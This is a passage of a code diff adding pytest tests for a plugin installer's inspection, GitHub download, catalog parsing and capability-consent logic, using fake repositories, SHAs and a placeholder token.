+        "source_kind": "github_url",
+        "source": "alice/extras",
+        "url": "https://github.com/alice/extras",
+        "ref": "",
+        "sha": "b" * 40,
+        "manifest": {"id": "extras", "version": "1.0.0"},
+        "capabilities": ["network"],
+        "trusted_modules": [],
+        "enabled": True,
+    }
+    entry.update(overrides)
+    return {"plugins": {"extras": entry}}
+
+
+# ── inspecting a pack that ships with the release ──────────────────────────
+
+def test_a_builtin_pack_is_official_and_asks_nobody_for_consent():
+    """A pack that arrived with the release came through a pull request in
+    this repository -- there is no third party here to be asked about."""
+    found = plugin_inspect.inspect_builtin("stats", lockfile={})
+    assert found.kind == "builtin"
+    assert found.mode == "install"
+    assert found.plugin_id == "stats"
+    assert found.catalog_id == "stats"
+    assert found.official is True
+    assert found.consent_required is False
+    assert found.python_deps == {}
+    assert found.warnings == ()
+    assert found.url is None and found.sha is None
+    assert found.name and found.version and found.description
+
+
+def test_a_builtin_packs_dependency_is_reported_without_installing_it():
+    """``edu`` needs model2vec, and the person deciding whether to install it
+    is entitled to know that before a pip runs, not after."""
+    found = plugin_inspect.inspect_builtin("edu", lockfile={})
+    assert found.python_deps == {"model2vec": ">=0.8.0"}
+    assert found.chapters == ("I1", "I2")
+    assert found.lessons[:2] == ("I1-1", "I1-2")
+
+
+def test_a_builtin_pack_in_the_lockfile_reads_as_an_up_to_date_update():
+    """No sha on either side, and that is the honest answer: the copy on
+    disk IS the copy that was installed."""
+    lockfile = {"plugins": {"stats": {"source_kind": "builtin", "enabled": True}}}
+    found = plugin_inspect.inspect_builtin("stats", lockfile=lockfile)
+    assert found.mode == "update"
+    assert found.up_to_date is True
+    assert found.installed == {
+        "sha": None,
+        "version": "",
+        "capabilities": (),
+        "trusted_modules": (),
+        "enabled": True,
+        "source_kind": "builtin",
+    }
+
+
+# ── inspecting a repository ────────────────────────────────────────────────
+
+def test_a_repository_is_read_at_the_resolved_sha(fake_github):
+    sha = fake_github(PLAIN_MANIFEST)
+    found = plugin_inspect.inspect_github("alice", "extras", "v1.2.0", lockfile={})
+    assert found.kind == "github"
+    assert found.mode == "install"
+    assert found.plugin_id == "extras"
+    assert found.sha == sha
+    assert found.ref == "v1.2.0"
+    assert found.url == "https://github.com/alice/extras"
+    assert found.source == "alice/extras@v1.2.0"
+    assert found.version == "1.2.0"
+    assert found.consent_required is True
+    assert found.catalog_id is None and found.official is False
+    assert found.installed is None and found.up_to_date is False
+
+
+def test_a_pinned_sha_is_never_re_resolved(monkeypatch, fake_github):
+    """The restore path: re-resolving a tag that has since moved would
+    install something other than what was pinned."""
+    fake_github(PLAIN_MANIFEST)
+
+    def _explode(*_a):  # pragma: no cover - only runs on a bug
+        raise AssertionError("a pinned install must not resolve the ref")
+
+    monkeypatch.setattr(github, "resolve_sha", _explode)
+    found = plugin_inspect.inspect_github(
+        "alice", "extras", "v1.2.0", lockfile={}, pinned_sha="c" * 40
+    )
+    assert found.sha == "c" * 40
+
+
+def test_everything_a_greedy_plugin_asks_for_is_reported_with_both_warnings(
+    fake_github,
+):
+    fake_github(GREEDY_MANIFEST)
+    found = plugin_inspect.inspect_github("alice", "extras", "", lockfile={})
+    # Sorted, not manifest order: ``normalize_capabilities`` is what a
+    # hand-written list goes through, and it de-duplicates and sorts.
+    assert found.capabilities == ("filesystem", "network")
+    assert found.allowed_modules == ("subprocess",)
+    assert found.has_frontend is True
+    assert found.chapters == ("I9",) and found.lessons == ("I9-1",)
+    assert found.consent_required is True
+    assert found.warnings == (
+        plugin_inspect.FRONTEND_WARNING,
+        plugin_inspect.ALLOWED_MODULES_WARNING.format(modules="subprocess"),
+    )
+    assert "subprocess" in found.warnings[1]
+
+
+def test_a_manifest_with_no_plugin_table_is_refused(fake_github):
+    fake_github('name = "not a manifest"\n')
+    with pytest.raises(ManifestError):
+        plugin_inspect.inspect_github("alice", "extras", "", lockfile={})
+
+
+@pytest.mark.parametrize("plugin_id", ["edu", "catalog"])
+def test_a_repository_may_not_claim_a_reserved_id(plugin_id, fake_github):
+    """``edu`` is a pack this build ships and ``catalog`` is a route under
+    /api/plugins/; either would be decided by the filesystem or the router
+    rather than by the install."""
+    fake_github(
+        f'[plugin]\nid = "{plugin_id}"\nversion = "1"\nschema_version = 1\n'
+    )
+    with pytest.raises(PluginInstallError) as excinfo:
+        plugin_inspect.inspect_github("alice", "extras", "", lockfile={})
+    assert plugin_id in str(excinfo.value)
+
+
+# ── an update compared against what was consented to ───────────────────────
+
+def test_an_update_names_the_capability_this_version_added(fake_github):
+    fake_github(GREEDY_MANIFEST, sha="d" * 40)
+    found = plugin_inspect.inspect_github(
+        "alice", "extras", "", lockfile=_installed()
+    )
+    assert found.mode == "update"
+    assert found.up_to_date is False
+    assert found.installed["sha"] == "b" * 40
+    assert found.installed["version"] == "1.0.0"
+    assert found.installed["capabilities"] == ("network",)
+    # ``network`` was already granted; ``filesystem`` and the module are new.
+    assert found.capabilities_added == ("filesystem",)
+    assert found.allowed_modules_added == ("subprocess",)
+
+
+def test_an_unchanged_sha_reads_as_up_to_date(fake_github):
+    fake_github(PLAIN_MANIFEST, sha="b" * 40)
+    found = plugin_inspect.inspect_github(
+        "alice", "extras", "", lockfile=_installed()
+    )
+    assert found.up_to_date is True
+    assert found.capabilities_added == ()
+
+
+def test_the_lockfile_is_what_says_what_was_granted(fake_github):
+    """A plugin that rewrote its manifest after install must not be shown as
+    if the new ask is what the user agreed to."""
+    fake_github(GREEDY_MANIFEST)
+    found = plugin_inspect.inspect_github(
+        "alice", "extras", "", lockfile=_installed(capabilities=[])
+    )
+    assert found.installed["capabilities"] == ()
+    assert found.capabilities_added == ("filesystem", "network")
+
+
+# ── dispatch: a typed source, and an installed one ─────────────────────────
+
+def test_a_catalog_name_inspects_the_pack_that_ships_here():
+    found = plugin_inspect.inspect_source("stats", lockfile={})
+    assert found.kind == "builtin" and found.plugin_id == "stats"
+
+
+def test_a_catalog_github_entry_carries_its_id_and_official_flag(
+    monkeypatch, fake_github
+):
+    """The catalog is the only thing entitled to call a pack official, so
+    that flag has to survive the trip through parse_source."""
+    monkeypatch.setattr(
+        catalog_module,
+        "load_catalog",
+        lambda *a, **k: {"schema": 1, "plugins": {"extras": {
+            "kind": "github",
+            "name": "Extras",
+            "repo": "alice/extras",
+            "ref": "v1.2.0",
+            "official": True,
+        }}},
+    )
+    fake_github(PLAIN_MANIFEST)
+    found = plugin_inspect.inspect_source("extras", lockfile={})
+    assert found.kind == "github"
+    assert found.catalog_id == "extras"
+    assert found.official is True
+    assert found.ref == "v1.2.0"
+
+
+def test_free_text_is_never_official(fake_github):
+    fake_github(PLAIN_MANIFEST)
+    found = plugin_inspect.inspect_source("alice/extras@v1.2.0", lockfile={})
+    assert found.official is False
+    assert found.catalog_id is None
+
+
+def test_an_installed_plugin_is_re_inspected_from_its_recorded_source(
+    fake_github,
+):
+    fake_github(PLAIN_MANIFEST, sha="e" * 40)
+    found = plugin_inspect.inspect_installed("extras", lockfile=_installed())
+    assert found.mode == "update"
+    assert found.url == "https://github.com/alice/extras"
+    assert found.sha == "e" * 40
+
+
+@pytest.mark.parametrize(
+    "plugin_id, lockfile",
+    [
+        ("nothing", {"plugins": {}}),
+        ("extras", {"plugins": {"extras": {"source_kind": "builtin"}}}),
+        ("extras", {"plugins": {"extras": {"source_kind": "github_url"}}}),
+    ],
+)
+def test_a_plugin_with_no_repository_to_update_from_says_so(plugin_id, lockfile):
+    with pytest.raises(PluginInstallError):
+        plugin_inspect.inspect_installed(plugin_id, lockfile=lockfile)
+
+
+# ── the GitHub client ──────────────────────────────────────────────────────
+
+class _FakeResponse:
+    """Just enough of an HTTP response for a streamed read."""
+
+    def __init__(self, chunks: list[bytes], headers: dict | None = None):
+        self._chunks = list(chunks)
+        self.headers = headers if headers is not None else {}
+
+    def read(self, size: int = -1) -> bytes:
+        return self._chunks.pop(0) if self._chunks else b""
+
+    def __enter__(self):
+        return self
+
+    def __exit__(self, *_exc):
+        return False
+
+
+def _http_error(code: int, body: bytes = b"", reason: str = "Some Reason"):
+    return HTTPError(
+        "https://api.github.com/x", code, reason, {}, io.BytesIO(body)
+    )
+
+
+@pytest.fixture
+def fake_urlopen(monkeypatch):
+    """Install a fake transport and hand back the requests it saw."""
+    seen: list = []
+
+    def _install(result):
+        def _urlopen(req, timeout=None):
+            seen.append(req)
+            if isinstance(result, Exception):
+                raise result
+            return result() if callable(result) else result
+
+        monkeypatch.setattr(github.urllib.request, "urlopen", _urlopen)
+        return seen
+
+    return _install
+
+
+def test_the_token_is_sent_only_when_the_environment_has_one(
+    monkeypatch, fake_urlopen
+):
+    """60 requests an hour is what a classroom behind one NAT gets without a
+    token -- and a token in a header nobody asked for is a leak."""
+    monkeypatch.delenv("CODEFYUI_GITHUB_TOKEN", raising=False)
+    seen = fake_urlopen(lambda: _FakeResponse([b"{}"]))
+    github._gh_get("https://api.github.com/x")
+    assert seen[-1].get_header("Authorization") is None
+    assert seen[-1].get_header("User-agent") == github.USER_AGENT
+
+    monkeypatch.setenv("CODEFYUI_GITHUB_TOKEN", "ghp_secret")
+    github._gh_get("https://api.github.com/x")
+    assert seen[-1].get_header("Authorization") == "Bearer ghp_secret"
+
+
+def test_a_missing_repository_and_a_broken_github_are_different_answers(
+    fake_urlopen,
+):
+    """404 is a typo in the repo name and 502 is GitHub; the status is the
+    only thing that tells the caller which sentence to show."""
+    fake_urlopen(_http_error(404, b'{"message": "Not Found"}', "Not Found"))
+    with pytest.raises(GitHubError) as excinfo:
+        github.resolve_sha("alice", "nope", "")
+    assert excinfo.value.status == 404
+    assert "alice/nope@HEAD" in str(excinfo.value)
+    assert "Not Found" in str(excinfo.value)
+
+    fake_urlopen(_http_error(502, b"<html>bad gateway</html>", "Bad Gateway"))
+    with pytest.raises(GitHubError) as excinfo:
+        github.resolve_sha("alice", "extras", "")
+    assert excinfo.value.status == 502
+    assert "Bad Gateway" in str(excinfo.value), "falls back to the reason phrase"
+
+
+def test_a_rate_limited_install_is_told_it_was_rate_limited(fake_urlopen):
+    """GitHub's reason phrase for this is "Forbidden", which reads as a
+    permissions problem. Its body says what actually happened."""
+    fake_urlopen(
+        _http_error(
+            403,
+            b'{"message": "API rate limit exceeded for 1.2.3.4."}',
+            "Forbidden",
+        )
+    )
+    with pytest.raises(GitHubError) as excinfo:
+        github.resolve_sha("alice", "extras", "")
+    assert excinfo.value.status == 403
+    assert "rate limit" in str(excinfo.value)
+
+
+def test_a_request_that_never_reached_github_has_no_status(fake_urlopen):
+    fake_urlopen(URLError("getaddrinfo failed"))
+    with pytest.raises(GitHubError) as excinfo:
+        github.resolve_sha("alice", "extras", "")
+    assert excinfo.value.status is None
+    assert "getaddrinfo failed" in str(excinfo.value)
+
+
+def test_a_commit_response_without_a_sha_is_refused(fake_urlopen):
+    fake_urlopen(lambda: _FakeResponse([b'{"documentation_url": "..."}']))
+    with pytest.raises(GitHubError) as excinfo:
+        github.resolve_sha("alice", "extras", "v1")
+    assert "missing 'sha'" in str(excinfo.value)
+
+
+def test_the_manifest_is_fetched_from_the_commit_not_the_branch(fake_urlopen):
+    seen = fake_urlopen(lambda: _FakeResponse([PLAIN_MANIFEST.encode("utf-8")]))
+    text = github.fetch_manifest_text("alice", "extras", "f" * 40)
+    assert text == PLAIN_MANIFEST
+    assert seen[-1].full_url == (
+        f"https://raw.githubusercontent.com/alice/extras/{'f' * 40}/"
+        "cdui.plugin.toml"
+    )
+
+
+# ── downloading ────────────────────────────────────────────────────────────
+
+def _chunks(count: int, size: int = 8) -> list[bytes]:
+    return [bytes([65 + i % 26]) * size for i in range(count)]
+
+
+def test_a_download_reports_progress_at_both_ends_and_throttles_between(
+    monkeypatch, fake_urlopen, tmp_path
+):
+    """A bar that stops at 97% because the download finished inside a
+    throttle window is worse than no bar."""
+    monkeypatch.setattr(github, "PROGRESS_MIN_INTERVAL_S", 3600.0)
+    body = _chunks(4)
+    fake_urlopen(lambda: _FakeResponse(body, {"Content-Length": "32"}))
+    seen: list[tuple[int, int | None]] = []
+    dest = tmp_path / "src.tar.gz"
+
+    github.download_tarball(
+        "alice", "extras", "f" * 40, dest, progress=lambda d, t: seen.append((d, t))
+    )
+    assert seen == [(0, 32), (32, 32)], "first and last are forced past the throttle"
+    assert dest.read_bytes() == b"".join(body)
+
+
+def test_every_chunk_reports_when_nothing_is_throttled(
+    monkeypatch, fake_urlopen, tmp_path
+):
+    monkeypatch.setattr(github, "PROGRESS_MIN_INTERVAL_S", 0.0)
+    fake_urlopen(lambda: _FakeResponse(_chunks(3)))
+    seen: list[tuple[int, int | None]] = []
+
+    github.download_tarball(
+        "alice", "extras", "f" * 40, tmp_path / "src.tar.gz",
+        progress=lambda d, t: seen.append((d, t)),
+    )
+    assert seen == [(0, None), (8, None), (16, None), (24, None), (24, None)]
+    assert all(total is None for _, total in seen), "no Content-Length, no total"
+
+
+def test_a_cancelled_download_stops_between_chunks_and_leaves_nothing(
+    fake_urlopen, tmp_path
+):
+    """Stop has to be felt inside the download. A check that only ran between
+    whole downloads would not be reached until the one being stopped had
+    finished."""
+    fake_urlopen(lambda: _FakeResponse(_chunks(50)))
+    dest = tmp_path / "src.tar.gz"
+    calls = {"n": 0}
+
+    def _cancel() -> bool:
+        calls["n"] += 1
+        return calls["n"] >= 2
+
+    with pytest.raises(PluginCancelled):
+        github.download_tarball(
+            "alice", "extras", "f" * 40, dest, cancel_check=_cancel
+        )
+    assert not dest.exists(), "half a tarball must not be left where a caller looks"
+
+
+def test_a_download_over_the_cap_is_refused_by_name(
+    monkeypatch, fake_urlopen, tmp_path
+):
+    monkeypatch.setattr(github, "MAX_TARBALL_BYTES", 1024 * 1024)
+    fake_urlopen(lambda: _FakeResponse(_chunks(2, size=700 * 1024)))
+    dest = tmp_path / "src.tar.gz"
+
+    with pytest.raises(PluginInstallError) as excinfo:
+        github.download_tarball("alice", "extras", "f" * 40, dest)
+    assert "1 MB" in str(excinfo.value)
+    assert "alice/extras" in (excinfo.value.hint or "")
+    assert not dest.exists()
+
+
+def test_a_download_that_fails_is_reported_as_a_github_failure(
+    fake_urlopen, tmp_path
+):
+    fake_urlopen(_http_error(404, b'{"message": "Not Found"}', "Not Found"))
+    dest = tmp_path / "src.tar.gz"
+    with pytest.raises(GitHubError) as excinfo:
+        github.download_tarball("alice", "extras", "f" * 40, dest)
+    assert excinfo.value.status == 404
+    assert not dest.exists()
+
+
+# ── extracting ─────────────────────────────────────────────────────────────
+
+def test_a_tarball_with_one_root_returns_that_root(tmp_path):
+    tar = tmp_path / "src.tar.gz"
+    _tarball_of({"extras-main/cdui.plugin.toml": PLAIN_MANIFEST}, tar)
+    dest = tmp_path / "out"
+    dest.mkdir()
+    root = github.extract_tarball(tar, dest)
+    assert root == dest / "extras-main"
+    assert (root / "cdui.plugin.toml").read_text(encoding="utf-8") == PLAIN_MANIFEST
+
+
+@pytest.mark.parametrize(
+    "files",
+    [
+        {"a/x.py": "x = 1", "b/y.py": "y = 2"},
+        {"loose.py": "x = 1"},
+    ],
+)
+def test_a_tarball_whose_root_cannot_be_guessed_is_refused(files, tmp_path):
+    """Two roots is not a plugin whose root can be picked; guessing would
+    install whichever one the filesystem happened to list first."""
+    tar = tmp_path / "src.tar.gz"
+    _tarball_of(files, tar)
+    dest = tmp_path / "out"
+    dest.mkdir()
+    with pytest.raises(PluginInstallError):
+        github.extract_tarball(tar, dest)
+
+
+# ── the consent arithmetic ─────────────────────────────────────────────────
+
+def test_what_this_answer_covers_and_what_is_still_outstanding():
+    decision = consent.decide_capabilities(
+        ("network", "filesystem"), accepted=("network",)
+    )
+    assert decision.granted == ("network",)
+    assert decision.missing == ("filesystem",)
+    assert decision.reused_prior is False
+    assert decision.grew == (), "no earlier install, so nothing has grown"
+
+
+def test_a_prior_grant_covers_a_capability_and_says_that_it_did():
+    decision = consent.decide_capabilities(
+        ("network",), prior=("network", "filesystem")
+    )
+    assert decision.granted == ("network",)
+    assert decision.missing == ()
+    assert decision.reused_prior is True
+    assert decision.grew == ()
+
+
+def test_a_capability_this_version_added_is_growth_even_before_it_is_decided():
+    decision = consent.decide_capabilities(
+        ("network", "process-env"), prior=("network",)
+    )
+    assert decision.grew == ("process-env",)
+    assert decision.missing == ("process-env",)
+    assert decision.reused_prior is True
+
+
+def test_no_earlier_install_and_an_empty_one_are_different_questions():
+    """``None`` is "never installed"; ``()`` is "installed and granted
+    nothing", and only the second makes a first request into growth."""
+    assert consent.decide_capabilities(("network",), prior=None).grew == ()
+    assert consent.decide_capabilities(("network",), prior=()).grew == ("network",)
+
+
+def test_the_answer_keeps_the_order_the_manifest_asked_in():
+    """A dialog lists these beside the manifest; a re-sorted list reads as a
+    different request."""
+    decision = consent.decide_capabilities(
+        ("process-env", "network", "filesystem"),
+        accepted=("filesystem", "process-env"),
+    )
+    assert decision.granted == ("process-env", "filesystem")
+    assert decision.missing == ("network",)
+
+
+def test_nothing_declared_needs_no_trust():
+    assert consent.check_trust((), trust_author=False) is None
+
+
+def test_trusting_the_author_is_what_unlocks_the_modules():
+    assert consent.check_trust(("subprocess",), trust_author=True) is None
+
+
+def test_an_untrusted_module_request_raises_with_the_whole_list():
+    """The caller's next move is to show the list and ask, so the list has to
+    be on the exception rather than re-derived from its sentence."""
+    with pytest.raises(ConsentRequired) as excinfo:
+        consent.check_trust(("subprocess", "ctypes"), trust_author=False)
+    assert excinfo.value.allowed_modules == ("subprocess", "ctypes")
+    assert excinfo.value.missing_capabilities == ()
+    assert "subprocess" in str(excinfo.value)
+
+
+def test_a_module_the_user_already_trusted_is_not_a_second_decision():
+    assert consent.check_trust(
+        ("subprocess",), trust_author=False, prior_trusted=["subprocess"]
+    ) is None
+
+
+def test_one_new_module_is_a_new_decision_however_short_the_list_was():
+    with pytest.raises(ConsentRequired) as excinfo:
+        consent.check_trust(
+            ("subprocess", "ctypes"), trust_author=False, prior_trusted=["subprocess"]
+        )
+    assert excinfo.value.allowed_modules == ("subprocess", "ctypes")

--- a/backend/tests/test_plugins_core_inspect.py
+++ b/backend/tests/test_plugins_core_inspect.py
@@ -360,6 +360,64 @@ def test_an_installed_plugin_is_re_inspected_from_its_recorded_source(
     assert found.mode == "update"
     assert found.url == "https://github.com/alice/extras"
     assert found.sha == "e" * 40
+    # A repository the catalog never heard of stays what it is.
+    assert found.catalog_id is None and found.official is False
+
+
+SELF_LEARNING_REPO = "CodefyUI/CodefyUI-Plugin-Self-Learning"
+SELF_LEARNING_MANIFEST = dedent("""\
+    [plugin]
+    id = "self-learning"
+    name = "Self-Learning"
+    version = "1.1.0"
+    schema_version = 1
+    """)
+
+
+def _installed_official(**overrides) -> dict:
+    entry = {
+        "source_kind": "github_url",
+        "source": SELF_LEARNING_REPO,
+        "url": f"https://github.com/{SELF_LEARNING_REPO}",
+        "ref": "",
+        "sha": "b" * 40,
+        "manifest": {"id": "self-learning", "version": "1.0.0"},
+        "capabilities": [],
+        "trusted_modules": [],
+        "enabled": True,
+    }
+    entry.update(overrides)
+    return {"plugins": {"self-learning": entry}}
+
+
+def test_an_update_of_a_catalog_pack_still_knows_it_is_the_catalog_pack(
+    fake_github,
+):
+    """The recorded ``catalog_id`` is what ``cdui plugin install <name>``
+    wrote down precisely so a later reader can tell the catalog's own pack
+    from free text carrying the same id. Dropping it on re-inspection made
+    every update of an official plugin read as third-party."""
+    fake_github(SELF_LEARNING_MANIFEST, sha="f" * 40)
+    found = plugin_inspect.inspect_installed(
+        "self-learning", lockfile=_installed_official(catalog_id="self-learning")
+    )
+    assert found.mode == "update"
+    assert found.catalog_id == "self-learning"
+    assert found.official is True
+
+
+def test_the_badge_is_re_derived_when_the_install_recorded_no_catalog_id(
+    fake_github,
+):
+    """Installed by URL rather than by name -- the same code from the same
+    repository by a longer road, and ``is_official``'s repository match is
+    what says so. The panel's badge and this dialog must not disagree."""
+    fake_github(SELF_LEARNING_MANIFEST, sha="f" * 40)
+    found = plugin_inspect.inspect_installed(
+        "self-learning", lockfile=_installed_official()
+    )
+    assert found.catalog_id is None, "nothing was recorded, so nothing is claimed"
+    assert found.official is True
 
 
 @pytest.mark.parametrize(

--- a/backend/tests/test_plugins_core_sources.py
+++ b/backend/tests/test_plugins_core_sources.py
@@ -1,0 +1,430 @@
+"""The plugin rules, tested where they now live rather than through the CLI.
+
+``test_plugin_cli.py`` already covers all of this through ``plugins.py`` --
+and must keep doing so, because that is the proof the extraction changed no
+behaviour. What it cannot cover is the half of the contract only a route will
+use: a refusal that carries the catalog ids as a tuple instead of a sentence,
+a ``CatalogEntry`` with fields a template can interpolate, and the accessors
+that answer about a manifest nobody promised was valid.
+
+So this file asks the questions a GUI asks. It leans on the real
+``plugins/registry.json`` and the real ``edu`` / ``stats`` manifests wherever
+the answer should be true of what this repository actually ships -- a
+synthetic fixture would keep passing after someone shipped a catalog entry
+the Plugin Center cannot render.
+"""
+
+from __future__ import annotations
+
+import logging
+
+import pytest
+
+from app.core import plugin_loader
+from app.core.plugins import (
+    ConsentRequired,
+    GitHubError,
+    ManifestError,
+    PluginCancelled,
+    PluginInstallError,
+    PluginNeedsRestart,
+    SourceError,
+)
+from app.core.plugins.catalog import (
+    RESERVED_PLUGIN_IDS,
+    CatalogEntry,
+    catalog_entries,
+    catalog_entry,
+    github_catalog_packs,
+    load_catalog,
+    validate_catalog,
+)
+from app.core.plugins.errors import UnknownCatalogName, UnparseableSource
+from app.core.plugins.manifest import (
+    manifest_allowed_modules,
+    manifest_has_frontend,
+    manifest_python_deps,
+    read_manifest,
+)
+from app.core.plugins.sources import ParsedSource, parse_source
+
+CATALOG_LOGGER = "app.core.plugins.catalog"
+
+
+# ── the failure vocabulary ─────────────────────────────────────────────────
+
+def test_the_install_failures_carry_what_a_dialog_needs():
+    """Nothing raises these yet -- the install paths come in a later change --
+    so this is what stops a typo in an attribute name from being found by a
+    route instead of by a test."""
+    assert PluginInstallError("x", hint="pip said no").hint == "pip said no"
+    assert PluginInstallError("x").hint is None
+
+    restart = PluginNeedsRestart("x", command="cdui plugin install foo")
+    assert restart.command == "cdui plugin install foo"
+    assert isinstance(restart, PluginInstallError)
+
+    consent = ConsentRequired(
+        "x", missing_capabilities=["network"], allowed_modules=("os",)
+    )
+    assert consent.missing_capabilities == ("network",)
+    assert consent.allowed_modules == ("os",)
+    assert isinstance(consent, PluginInstallError)
+    assert ConsentRequired("x").missing_capabilities == ()
+
+    assert GitHubError("x", status=404).status == 404
+    assert GitHubError("x").status is None, "no status means it never got that far"
+
+
+def test_a_cancel_is_not_an_install_failure():
+    """The system doing as it was told. An ``except PluginInstallError`` that
+    caught this would report the user's own Stop as something that broke."""
+    assert not isinstance(PluginCancelled(), PluginInstallError)
+
+
+def test_the_refusals_stay_the_exception_types_their_callers_already_catch():
+    assert issubclass(ManifestError, ValueError)
+    assert issubclass(SourceError, ValueError)
+    assert issubclass(UnknownCatalogName, SourceError)
+    assert issubclass(UnparseableSource, SourceError)
+    assert issubclass(PluginInstallError, RuntimeError)
+
+
+# ── parse_source ───────────────────────────────────────────────────────────
+
+def test_a_catalog_id_resolves_to_the_pack_that_ships_here():
+    parsed = parse_source("foundations")
+    assert isinstance(parsed, ParsedSource)
+    assert parsed == ParsedSource("catalog", "foundations", "", "")
+
+
+@pytest.mark.parametrize("spec", ["rl", "RL", "Rl"])
+def test_the_catalog_lookup_is_case_insensitive_and_answers_lower_case(spec):
+    """The id is a directory name, so the answer has to be the spelling on
+    disk however the user typed it."""
+    assert parse_source(spec) == ParsedSource("catalog", "rl", "", "")
+
+
+def test_the_catalog_wins_over_the_github_short_form():
+    """``deep`` is a legal repository name too, and a bare word that IS a
+    catalog id must resolve to the pack shipped here rather than to whatever
+    happens to be on GitHub."""
+    assert parse_source("deep").kind == "catalog"
+
+
+@pytest.mark.parametrize(
+    "spec, expected",
+    [
+        ("alice/extras", ParsedSource("github", "alice", "extras", "")),
+        ("alice/extras@v1.2.3", ParsedSource("github", "alice", "extras", "v1.2.3")),
+        (
+            "https://github.com/alice/extras",
+            ParsedSource("github", "alice", "extras", ""),
+        ),
+        (
+            "https://github.com/alice/extras.git",
+            ParsedSource("github", "alice", "extras", ""),
+        ),
+        (
+            "https://github.com/alice/extras@v2",
+            ParsedSource("github", "alice", "extras", "v2"),
+        ),
+        (
+            "https://github.com/alice/extras.git@v2",
+            ParsedSource("github", "alice", "extras", "v2"),
+        ),
+        (
+            "http://www.github.com/alice/extras",
+            ParsedSource("github", "alice", "extras", ""),
+        ),
+    ],
+)
+def test_the_github_shapes_all_reach_the_same_owner_and_repo(spec, expected):
+    """One field, four spellings: a person with a plugin in mind should not
+    have to know which of them the installer prefers."""
+    assert parse_source(spec) == expected
+
+
+def test_an_unknown_bare_word_names_the_catalog_it_was_not_in():
+    """A bare word can only have been meant as a catalog name, so the answer
+    is "yours does not have that one" plus the ids it does -- as DATA, so the
+    CLI's bilingual sentence and a route's JSON both build from the same
+    refusal."""
+    with pytest.raises(UnknownCatalogName) as excinfo:
+        parse_source("edo")
+    error = excinfo.value
+    assert error.spec == "edo"
+    assert set(error.known) == set(load_catalog()["plugins"])
+    assert error.known == tuple(sorted(error.known)), "sorted, for a stable message"
+    assert error.catalog_path == plugin_loader.plugins_builtin_root() / "registry.json"
+
+
+def test_an_unknown_bare_word_against_an_unreadable_catalog_says_so_with_no_ids():
+    """An empty catalog fails every name including the valid ones, and the
+    empty ``known`` is what lets a caller say that instead of blaming the
+    name."""
+    with pytest.raises(UnknownCatalogName) as excinfo:
+        parse_source("foundations", catalog={"schema": 1, "plugins": {}})
+    assert excinfo.value.known == ()
+
+
+def test_an_injected_catalog_is_what_gets_searched():
+    """The seam ``scripts/plugins.py`` needs: its tests fake the catalog by
+    patching the CLI's own loader, and this must answer from what it is
+    handed rather than from the registry on disk."""
+    catalog = {"schema": 1, "plugins": {"only-this": {"kind": "builtin"}}}
+    assert parse_source("only-this", catalog=catalog).kind == "catalog"
+    with pytest.raises(UnknownCatalogName):
+        parse_source("foundations", catalog=catalog)
+
+
+@pytest.mark.parametrize(
+    "spec",
+    [
+        "not a valid source spec",
+        "",
+        "https://gitlab.com/alice/extras",
+        "alice/extras/deeper",
+        "-leading-dash",
+    ],
+)
+def test_garbage_is_refused_as_unparseable(spec):
+    with pytest.raises(UnparseableSource) as excinfo:
+        parse_source(spec)
+    assert excinfo.value.spec == spec
+
+
+def test_both_refusals_stay_catchable_as_ValueError():
+    """``cmd_install``, ``cmd_info`` and ``scripts/project.py`` all catch
+    ``ValueError`` around this call and none of them was changed."""
+    for spec in ("edo", "not a valid source spec"):
+        with pytest.raises(ValueError):
+            parse_source(spec)
+
+
+# ── the catalog this build ships ───────────────────────────────────────────
+
+def test_reserved_ids_are_the_fixed_segments_under_api_plugins():
+    assert RESERVED_PLUGIN_IDS == frozenset({
+        "catalog", "inspect", "install", "jobs", "generation", "reload",
+    })
+    assert isinstance(RESERVED_PLUGIN_IDS, frozenset)
+
+
+def test_no_pack_this_build_ships_claims_a_reserved_id():
+    """The point of the set: a pack called ``install`` would sit where the
+    install route already lives, and the router would decide which wins."""
+    assert not (set(catalog_entries()) & RESERVED_PLUGIN_IDS)
+
+
+def test_every_entry_the_repository_ships_survives_validation():
+    """A catalog entry the Plugin Center cannot render is a pack a student
+    cannot install, and it would ship green without this."""
+    raw = load_catalog()["plugins"]
+    entries = catalog_entries()
+    assert set(entries) == set(raw)
+    assert {"edu", "foundations", "deep", "stats", "rl"} <= set(entries)
+
+
+def test_a_real_entry_is_carried_across_field_by_field():
+    entries = catalog_entries()
+    stats = entries["stats"]
+    assert isinstance(stats, CatalogEntry)
+    assert stats.id == "stats"
+    assert stats.kind == "builtin"
+    assert stats.path == "plugins/stats"
+    assert stats.tags == ("statistics", "chart", "table", "eda", "confusion-matrix")
+    assert "Descriptive statistics" in stats.description
+    # Absent optional values are renderable rather than None.
+    assert (stats.ref, stats.homepage, stats.chapters) == ("", "", ())
+    assert stats.official is False
+    assert stats.repo is None
+    assert entries["edu"].chapters == ("I1", "I2")
+
+
+def test_github_catalog_packs_lists_the_repository_entries_sorted_by_id(monkeypatch):
+    """The shape is in the schema so a Plugin Center never has to invent it,
+    and nothing ships through it today -- which is exactly why it is tested
+    against a catalog that does."""
+    monkeypatch.setattr("app.core.plugins.catalog.load_catalog", lambda: {
+        "schema": 1,
+        "plugins": {
+            "zebra": {"kind": "github", "name": "Z", "repo": "alice/zebra"},
+            "here": {"kind": "builtin", "name": "H", "path": "plugins/here"},
+            "aardvark": {"kind": "github", "name": "A", "repo": "bob/aardvark"},
+        },
+    })
+    assert [entry.id for entry in github_catalog_packs()] == ["aardvark", "zebra"]
+
+
+def test_catalog_entry_is_case_insensitive():
+    assert catalog_entry("Stats") == catalog_entry("stats")
+    assert catalog_entry("STATS").id == "stats"
+    assert catalog_entry("no-such-pack") is None
+
+
+# ── validate_catalog drops, never raises ───────────────────────────────────
+
+def _one(entry: dict, plugin_id: str = "pack") -> dict:
+    return {"schema": 1, "plugins": {plugin_id: entry}}
+
+
+GOOD_BUILTIN = {"kind": "builtin", "name": "Pack", "path": "plugins/pack"}
+GOOD_GITHUB = {"kind": "github", "name": "Pack", "repo": "alice/extras"}
+
+
+def test_a_github_entry_keeps_its_repo_ref_and_flags():
+    entries = validate_catalog(_one({
+        "kind": "github",
+        "name": "Extras",
+        "description": "third-party",
+        "repo": "alice/extras",
+        "ref": "v1.2.3",
+        "homepage": "https://example.invalid",
+        "tags": ["extra", 7],
+        "official": True,
+    }))
+    entry = entries["pack"]
+    assert entry.repo == "alice/extras"
+    assert entry.ref == "v1.2.3"
+    assert entry.homepage == "https://example.invalid"
+    assert entry.official is True
+    assert entry.tags == ("extra",), "a non-string tag is dropped, not coerced"
+    assert entry.path is None
+
+
+@pytest.mark.parametrize(
